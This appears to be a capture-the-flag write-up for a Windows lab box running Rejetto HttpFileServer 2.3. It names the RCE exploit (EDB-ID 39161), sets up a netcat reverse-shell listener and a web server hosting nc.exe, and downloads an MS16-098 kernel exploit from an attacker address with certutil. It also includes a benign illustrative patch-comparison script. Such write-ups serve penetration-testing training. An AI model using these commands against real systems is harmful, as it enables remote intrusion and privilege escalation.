Port Scanning and General Enumeration (Nmap)
The initial scan showed that only port 80 (HTTP) is open.
Clicking the link takes us to www.rejetto.com
What we know:
- It’s running HttpFileServer 2.3
- The vendor is rejetto
Access (searchsploit, Rejetto HFS RCE)
Let’s see if there’s anything on searchsploit for “http file server 2.3”. The relevant entry is Remote Command Execution (2), EDB-ID 39161:
searchsploit -m 39161.py
The -m flag copies the exploit into our current working directory.
Let’s read a bit about what it does:
# Usage : python Exploit.py <Target IP address> <Target Port Number>
# EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
#           You may need to run it multiple times for success!
So we need to be hosting nc.exe on port 80. That’s easy enough. On Kali, Windows binaries are stored at
Now we’re going to need a few tabs:
- On one, our python server (python3 -m http.server 80) where
- On another, a listener waiting to catch our shell (nc -lvnp 4444)
- And finally, one to fire the exploit
This is what mine looked like after the exploit completed:
Privesc (Windows Exploit Suggester, MS16-098)
I ran winPEAS on the machine, but it didn’t come back with much, so I assume we’re looking at a kernel exploit. Let’s try Windows Exploit Suggester.
Note: for Windows Exploit Suggester to work we need to install a specific version of xlrd:
pip2 install --user xlrd==1.1.0
There are a couple of things we need to do before we can run this:
- First, run it with the --update switch. That will write an .xls database file for us to use.
- Second, on the victim machine, run systeminfo, copy all of the output and save it to a file. I’ll name mine systeminfo.txt.
- Now run it:
python windows-exploit-suggester.py -database 2021-01-25-mssb.xls -systeminfo systeminfo.txt
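Windows Exploit Suggester works by reading the systeminfo output and comparing the installed hotfixes against Microsoft’s bulletin database. As an added illustration, not code from this writeup or from the Windows Exploit Suggester project, here is a small Python parser that does the same kind of comparison against a constructed sample of systeminfo output and a placeholder list of required KBs (the KB numbers in the "required" set are placeholders, not the real patches for MS16-098):

```python
import re

# Constructed, abridged sample of `systeminfo` output (not taken from the page).
SAMPLE_SYSTEMINFO = """\
Host Name:                 EXAMPLE-HOST
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB2919442
                           [03]: KB3000850
Network Card(s):           1 NIC(s) Installed.
"""


def parse_systeminfo(text):
    """Return (os_name, os_version, installed_kbs) from raw systeminfo output.

    Top-level fields look like "Key:   value"; hotfix entries are indented
    "[NN]: KBxxxxxxx" lines, so they are collected separately by regex.
    """
    fields = {}
    for line in text.splitlines():
        # Only un-indented "Key: value" lines are top-level fields.
        m = re.match(r"^([A-Za-z][A-Za-z ()/]*?):\s+(.*)$", line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    installed_kbs = set(re.findall(r"\bKB\d{6,7}\b", text))
    return fields.get("OS Name", ""), fields.get("OS Version", ""), installed_kbs


def missing_patches(installed_kbs, required_kbs):
    """Sorted list of required KBs that are not present on the host."""
    return sorted(kb for kb in required_kbs if kb not in installed_kbs)


if __name__ == "__main__":
    name, version, kbs = parse_systeminfo(SAMPLE_SYSTEMINFO)
    # Placeholder KB numbers for illustration only; a real audit would use
    # the bulletin database that --update downloads.
    required = {"KB3000850", "KB9999999"}
    print(name, version)
    print("missing:", missing_patches(kbs, required))
```

Pointing this at the systeminfo.txt you copied off the victim gives the same OS/hotfix inventory that the suggester feeds into its bulletin lookup.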
Let’s look at MS16-098. There’s a precompiled binary for us to grab on the GitHub page. Let’s grab that and transfer it over to the victim machine:
certutil -urlcache -f Http://10.10.14.18:8000/ms16098.exe ms16098.exe
Give it a run!